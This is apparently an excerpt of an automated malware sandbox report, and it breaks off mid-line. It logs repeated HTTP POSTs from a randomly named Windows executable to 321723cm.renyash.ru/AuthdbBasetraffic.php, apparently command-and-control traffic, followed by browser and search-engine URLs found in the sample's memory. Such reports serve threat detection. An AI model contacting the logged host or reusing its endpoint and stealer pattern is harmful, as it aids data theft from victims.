                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1892Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 321723cm.renyash.ru
                              Source: unknownHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://321723cm.reP
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://321723cm.rePb
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.0000000003C03000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://321723cm.renyash.ru
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://321723cm.renyash.ru/
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.00000000037DE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.00000000037B6000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000383E000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.0000000003C03000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://321723cm.renyash.ru/AuthdbBasetraffic.php
                              Source: r6cRyCpdfS.exe, 00000000.00000002.1746716592.0000000003482000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000141EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000141EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 